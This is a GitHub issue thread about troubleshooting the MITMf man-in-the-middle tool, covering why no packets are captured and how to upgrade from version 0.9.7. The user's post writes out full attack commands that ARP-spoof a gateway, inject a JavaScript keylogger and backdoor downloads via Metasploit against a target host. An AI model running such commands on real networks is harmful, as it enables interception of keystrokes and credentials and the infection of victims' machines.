### ISSUE TITLE
mitmf problem no packets

### ISSUE THREAD

**Issue by instantman05** [byt3bl33d3r/MITMf#215]
Hello,

I have a problem with mitmf. I have install the new version on https://github.com/byt3bl33d3r/MITMf/wiki/Installation

If I was finish , I started the terminal and wrote this command:
1. mitmf -i eth0 --spoof --arp --gateway 192.168.1.2 --target 192.168.2.9 --jskeylogger
and I have it once so:
2. mitmf -i eth0 --spoof --arp --gateway 192.168.1.2 --target 192.168.2.9 --jskeylogger --filepwn 
Command 2 has successful connected to meta sploit.

so now my problem is that I get no packets. If the "Victim" open IE 11 or Firefox and write google.de It gives no packets. It looks like this.
![mitmfnew](https://cloud.githubusercontent.com/assets/15571300/10870283/fea3809a-80c6-11e5-9be1-64397a18c05f.PNG)

**Comment by byt3bl33d3r** [comment]
@instantman05 Hi, try going to an http only webite

**Comment by instantman05** [comment]
It still does not work. What could be the problem?

**Comment by byt3bl33d3r** [comment]
what MITMf version are you running?

**Comment by instantman05** [comment]
0.9.7 Version

**Comment by byt3bl33d3r** [comment]
@instantman05 you're not using the latest version, see https://github.com/byt3bl33d3r/MITMf/wiki/Installation for intallation instructions

**Comment by instantman05** [comment]
I clicked on the link and installed but the version is still 0.9.7

**Comment by Alter79** [comment]
silly question... now I have both version installed, 0.9.7 from Kali rep, and 0.9.8 following the wiki... how can I get rid of the old one? thanks

**Comment by xmcp** [comment]
@Alter79 `apt-get remove mitmf`
